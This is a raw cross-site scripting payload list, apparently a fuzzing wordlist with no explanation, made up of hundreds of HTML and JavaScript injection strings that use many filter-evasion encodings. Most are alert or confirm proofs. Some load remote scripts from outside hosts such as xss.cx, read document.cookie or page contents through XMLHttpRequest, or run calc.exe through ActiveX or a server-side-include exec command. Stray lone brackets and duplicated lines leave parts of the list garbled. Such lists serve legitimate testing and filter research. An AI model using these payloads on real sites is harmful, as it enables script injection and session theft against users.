<IMG SRC=javascript:confirm("XSS")>
<IMG SRC=javascript:prompt(document.location)>
<IMG SRC="jav	ascript:confirm(<WBR>document.location);">
<IMG SRC="jav	ascript:confirm(document.location);">
<IMG SRC="jav
ascript:confirm(<WBR>document.location);">
<IMG SRC="jav
ascript:confirm(document.location);">
<IMG SRC="jav
ascript:confirm(<WBR>document.location);">
<IMG SRC="jav
ascript:confirm(document.location);">
<IMG SRC="livescript:[code]">
<IMG SRC="mocha:[code]">
<IMG SRC='vbscript:msgbox(document.location)'>
<IMG SRC=javascript:alert('XSS')>
<IMG STYLE="xss:expr/*XSS*/ession(confirm(document.location))">
<IMG onmouseover =confirm(1)>
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:confirm(document.location);">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="http://xss.cx/xss.css">
<LINK REL="stylesheet" HREF="javascript:confirm(document.location);">
<
<
<META HTTP-EQUIV="Link" Content="<http://xss.cx/xss.css>; REL=stylesheet">
<META HTTP-EQUIV="Link" Content="<javascript:confirm(document.location)>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>confirm(document.location)</SCRIPT>">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:confirm(document.location);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:confirm(document.location);">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.cx/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>
PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+
<S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>
<SCR%00IPT>confirm(document.location)</SCR%00IPT>
<SCRIPT SRC="http://xss.cx/xss.jpg"></SCRIPT>
<SCRIPT SRC=http://xss.cx/xss.js?<B>
<SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>
<SCRIPT a=">" '' SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=">" SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
</SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT/XSS SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT>a=document.cookie
<SCRIPT>confirm(document.location);</SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.cx/xss.js"></SCRIPT>
SRC=
<IMG 6;avascript:alert('XSS')>
<STYLE TYPE="text/javascript">confirm(document.location);</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A>
<STYLE>@import'http://xss.cx/xss.css';</STYLE>
"><STYLE>@import"javascript:confirm(document.location)";</STYLE>
<STYLE>@im\port'\ja\vasc\ript:confirm(document.location)';</STYLE>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<TABLE BACKGROUND="javascript:confirm(document.location)">
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<a data-remote=true data-method=delete href=/delete_account>CLICK</a>
<a href=````>
<a href="#" onclick="confirm(' ');alert(2 ')">name</a>
<a href='#' onmouseover ="javascript:$('a').html(5)">a link</a>
<a href="// ͥ.ws">CLICK
<a href=[0x0b]" onclick=confirm(1)//">click</a>
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
<a href=``calc``>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>
<a href="data:text/html,%3cscript>confirm (1)</script>" >hello
<a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk+">click</a>
"/><a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<a href="data:text/html,<script>eval(name)</script>" target="confirm(1)">click</a>
<a href=``explorer.exe``>
<a href="invalid:1" id=x name=y>test</a>
"/><a href="invalid:2" id=x name=y>test</a>
<a href="javascript:window['confirm'](1)">aa</a>
<a href="jAvAsCrIpT:confirm(1)">X</a>
<a href="jAvAsCrIpT:confirm(1)">X</a>
<a href="javas	cri
pt:confirm(1)">test</a>
<a href="//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a>
"/><a href=javascript:confirm(document.cookie)>Click Here</a>
"><a href=javascript:confirm(document.cookie)>Click Here</a>
<a href=javascript:confirm(document.cookie)>Click-XSS</a>
"><a href="javascript:\u0061le%72t(1)"><button>
<a href="javascript:\u0061le%72t(1)"><button>
<a href="javascript:'hello'" rel="sidebar">x</a>
<a href="javascript:void(0)" onmouseover=
javascript:confirm(1)
>X</a>
<a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme
a href="j&#x26#x41;vascript:confirm%252831337%2529">Hello</a>
<a href=``mspaint.exe``>
<a href=``notepad.exe``>
<a href=``shell:System``>
<a href='vbscript:"\"&confirm(1)''"'>
<a href="x:confirm(1)" id="test">click</a><script>eval(test+'')</script>
<a href=``xss.cx``>
<a id="x" href='http://adspecs.yahoo.com/adspecs.php' target="close(/*grabcookie(1)*/)">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>
<a rel="noreferrer" href="//xss.cx">click</a>
<a target=_blank href="data:text/html,<script>confirm(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
<a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;#test<a"'%0A`= +%20>;
<a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;&x="><img src=x onerror=prompt(1);>#"><img src=x onerror=prompt(1);>test<a"'%0A`= +%20>;
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
about://xss.cx
<a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a>
<a/href=data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
<a$href="data:text/html,%style=""3cscript>confirm((1)</sstyle=""cript>" onerror=>hello
<a/href=java	script:confirm%28/XSS/%29>click</a>
<a/href="javascript: javascript:prompt(1)"><input type="X">
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>xss
<a�[\x0B]onmosemove=confirm('\Done\')>
<a[\x0B]�onmouseover�=location=’jav\x41script\x3aconfirm\x28″ZDresearch”\x29′>ZDresearch
<body language=vbs onload=confirm-1
<body language=vbs onload=confirm-1
<body language=vbs onload=confirm-1
"><body language=vbs onload=window.location='http://xss.cx'>
<body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'>
<body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<body/onload=<!-->
confirm(1)>
<body/onload=<!-->
confirm(1)>
"<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>"
"\"><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>",
<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>
><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>
<button autofocus onfocus=confirm(2)>
<button onclick="window.open('http://xss.cx/::Error138 ');">CLICKME
"<button>'><img src=x onerror=confirm(0);></button>"
<button>'><img src=x onerror=confirm(0);></button>
charset=utf-
'`"><*chr*script>log(*num*)</script>
<command onmouseover="javascript:confirm(0);">Save //
<*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>
<*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>
<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>?f
<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
<div id="confirm(2)" style="x:expression(eval)(id)">
<div onmouseover='confirm(1)'>DIV</div>
<div onmouseover='confirm(1)'>DIV</div>
<div style="color:rgb(''�x:expression(confirm(URL=1))"></div>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>
<%div%20style=xss:expression(prompt(1))>
<div/onmouseover='confirm(1)'> style="x:">
<div/onmouseover='confirm(1)'> style="x:">
<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>
<div/style="width:expression(confirm(1))">X</div>
<embed code="http://xss.cx/xss.swf" allowscriptaccess=always></embed>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.cx/xss.js></SCRIPT>'"-->
exp/*<XSS STYLE='no\xss:noxss("*//*");
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true);
<form action='data:text/html,<script>confirm(1)</script>'><button>CLICK
<form action='java	scri	pt:confirm(1)'><button>CLICK
<form action="javas	cript:confirm(1)" method="get"><input type="submit" value="Submit"></form>
<form id="myform" value="" action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type="submit" value="Absenden"></form>
<form name=location >
<form><a href="javascript:\u0061lert(1)">X
<form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit>
<form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit>
<form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit>
//<form/action=javascript:confirm(document.cookie)><input/type='submit'>//
<form><button formaction=javascript:confirm(1)>CLICKME
<form><iframe 	  src="javascript:confirm(1)" 	;>
<form><input type=submit formaction=//xss.cx><textarea name=x>
<form><isindex formaction="javascript:confirm(1)"
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<frameset><frame/src=//xss.cx>
>
>
http://www.google<script .com>confirm(document.location)</script
http://www.<script abc>setTimeout('confirm(1)',1)</script .com>
http://www.<script>confirm(1)</script .com
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
<!--[if<img src=x:x onerror=confirm(5)//]-->
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<iframe %00 src="	javascript:prompt(1)	"%00>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); confirm(Safe.get());</script>
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<iframe src="" onmouseover="confirm(document.cookie)">
<iframe src="#" style=width:exp/**/ressi/**/on(confirm(1))>
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src="data:D,<script>confirm(top.document.body.innerHTML)</script>">
<iframe src="data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E"></iframe>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe srcdoc='<body onload=prompt(1)>'>
<iframe srcdoc='<svg/onload=confirm(3)>'>
<iframe srcdoc="<svg/onload=confirm(domain)>">
<iframe src="http://xss.cx?x=<iframe name=x></iframe>"></iframe><a href="http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script>
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<iframe src=javascript:confirm(document.location)>
<iframe src="javascript:'<script src=http://xss.cx ></script>'"></iframe>
"><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe width=0 height=0 src="javascript:confirm(1)">
<iframe/%00/ src=javaSCRIPT:confirm(1)
"><iframe%20src="http://google.com"%%203E
iframe.contentWindow.location.constructor.prototype
<iframe><iframe src=javascript:confirm(4)></iframe>
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
"><iframe/onreadystatechange=confirm(1)
<iframe/onreadystatechange=confirm(1)
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
"><iframe/src \/\/onload = prompt(1)
<iframe/src \/\/onload = prompt(1)
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe/src="data:text/html,<svg onload=confirm(1)>">
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
<iframe/src=j	av	as	cri	pt	:co	nfir	m	(		1	)>
<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>
<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>
<!--[if]><script>confirm(1)</script -->
<img language=vbs src=<b onerror=confirm#1/1#>
"><img src="/" =_=" title="onerror='prompt(1)'">
<img src="/" =_=" title="onerror='prompt(1)'">
<img src ?itworksonchrome?\/onerror = confirm(1)
<img src ?itworksonchrome?\/onerror = confirm(1)???
“><img src= onerror=confirm(1)>
<img src=//\ onload=confirm(1)>
<img src=`%00`
 onerror=confirm(1)

<img src=1 onerror=Function("aler"+"t(documen"+"t.domain)")()>
"]<img src=1 onerror=confirm(1)>
/#<img src=1 onerror=javascript:confirm(3)>
<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>
<img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #
"><img src=javascript:while([{}]);>
<img src=javascript:while([{}]);>
<img/ src//'onerror/''/=confirm(1)//'>
<img src=test.jpg?value=">Yes, we are still inside a tag!">
<img src=x on*chr*Error="javascript:log(*num*)"/>
<img src=x on*chr*Error="javascript:log(*num*)"/>
<img src=x onerror=URL='javascript:confirm(1)'>
"\"><img src=\"x\" onerror=\"confirm(0)\"/>",
><img src=\"x\" onerror=\"confirm(0)\"/>
<img src=x onerror='confirm(domain+/ -- /+cookie)'>">
<img src=x onerror='confirm(domain+/ -- /+cookie)'>">
"><img src=x onerror=confirm('x') />]
"><img src=x onerror=confirm(1); ...
"><img src=x onerror=prompt(1);>
"><img src=x onerror=prompt(document.location);>#"><img src=x onerror=prompt(document.location);>
"><img src=x onerror=prompt("xss");>#"><img src=x onerror=prompt("xss");>
"><img src=x onerror=window.open('https://www.google.com/');>
"<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>"
"\"><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>",
<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
"<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>"
<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>
"/><img src=x onerror=x.onerror=prompt(0)>
"\"/><img src=x onerror=x.onerror=prompt(0)>"
"/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>
"\"/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>"
<![<img src=x:x onerror=`confirm(2)//`]-->
<img src=xx: onerror=confirm(document.location)>
"><img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script>
<img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script>
"<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>"
"\"><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>",
<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
<img src=xx:xx onerror=window[['logChr*chr*']](*num*)>
<img src=`xx:xx`onerror=confirm(1)>
<img src=`xx:xx`onerror=confirm(1)>
<img/	  src=`~` onerror=prompt(1)>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
"<img/src=` onerror=confirm(1)>"
<img/src=` onerror=confirm(1)>
"><--`<img/src=` onerror=confirm(1)> --!>
<--`<img/src=` onerror=confirm(1)> --!>
<img/src=%00 id=confirm(1) onerror=eval(id)
<img/src=`%00` /id=confirm(1) /onerror=eval(id)
<img/src=`%00` onerror=this.onerror=confirm(1)
<img/src=@  onerror = prompt('1')
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
"\"><imgsrc=x onerror=confirm.onerror=confirm(1)>",
><imgsrc=x onerror=confirm.onerror=confirm(1)>
<img/src="x"/id="javascript"/name=":confirm"/alt="(1)"/onerror="eval(id + name + alt)">
=’”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>
'><img/src="x:x"/onerror="confirm(1)"'><
innerHTML=document.title
innerHTML=innerText
<input autofocus onfocus=confirm(1)>
<input formaction=JaVaScript:confirm(document.cookie)>
<input id=x><input id=x><script>confirm(x)</script>
<><input onfocus=confirm(0) autofocus <!--
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>
<input type=hidden onformchange=confirm(1)/>
<input type=hidden style=`x:expression(confirm(1))`>
<input type=hidden style=`x:expression(confirm(4))`>
<input type="text" name="a"
<input type="text" value=`` <div/onmouseover='confirm(1)'>X</div>
<input type="text" value=``<div/onmouseover='confirm(1)'>X</div>
"><input value=<><iframe/src=javascript:confirm(1)
<input value=<><iframe/src=javascript:confirm(1)
input1=<script/&in%u2119ut1=>al%u0117rt('1')</script>
<input/onmouseover="javaSCRIPT:confirm(1)"
<i/onclick=URL=name>
"/><isindex action="javas	cript:confirm(1)" type=image>
"><isindex action="javas	cript:confirm(1)" type=image>
<isindex action="javas	cript:confirm(1)" type=image>
<isindex action="javas	cript:confirm(document.cookie)" type=image>
<isindex formaction=javascript:confirm(1)>
<label class="<% confirm(1) %>">
<li style="color:rgb(''0,0,�javascript:expression(confirm(1))">XSS</li>
<link rel="import" href="//xss.cx">
<link rel=import onerror=confirm(1)>
<link rel="prefetch" href="http://xss.cx">
<link rel=stylesheet href='data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D' >
<link%20rel="import"%20href="?bypass=<script>confirm(document.domain)</script>">
<listing><img src=x onerror=confirm(1)></listing>
<
<
<a href="http://i.imgur.com/b7sajuK.jpg" download><a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a></a>
<img src=xx:x onerror=confirm(1)><script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>
<label class="<% confirm(1) %>">
</script><script>confirm(1)</script>
<marquee onstart='javascript:confirm(1)'>^__^
"><marquee>confirm( `bypass :)`)</marquee>
"<marquee/onstart=confirm(/XSS/.source);confirm(1)>"
"\"><marquee/onstart=confirm(/XSS/.source);confirm(1)>",
<marquee/onstart=confirm(/XSS/.source);confirm(1)>
><marquee/onstart=confirm(/XSS/.source);confirm(1)>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<math><a/xlink:href=javascript:confirm(1)>click
<math><a/xlink:href=javascript:eval('\141\154\145\162\164\50\61\51')>X
<meta charset="x-mac-farsi">¼script ¾confirm(1)//¼/script ¾
<meta content="
 1 
; JAVASCRIPT: confirm(1)" http-equiv="refresh"/>
<meta http-equiv=refresh content="0 javascript:confirm(1)">
"><meta http-equiv="refresh" content="0;javascript:confirm(1)"/>
<meta http-equiv="refresh" content="0;javascript:confirm(1)"/>
<meta http-equiv="refresh" content="0;javascript:confirm(1)"/>?
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>
?movieName=";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
"\"\/><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>"
><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>"
<object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
"><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
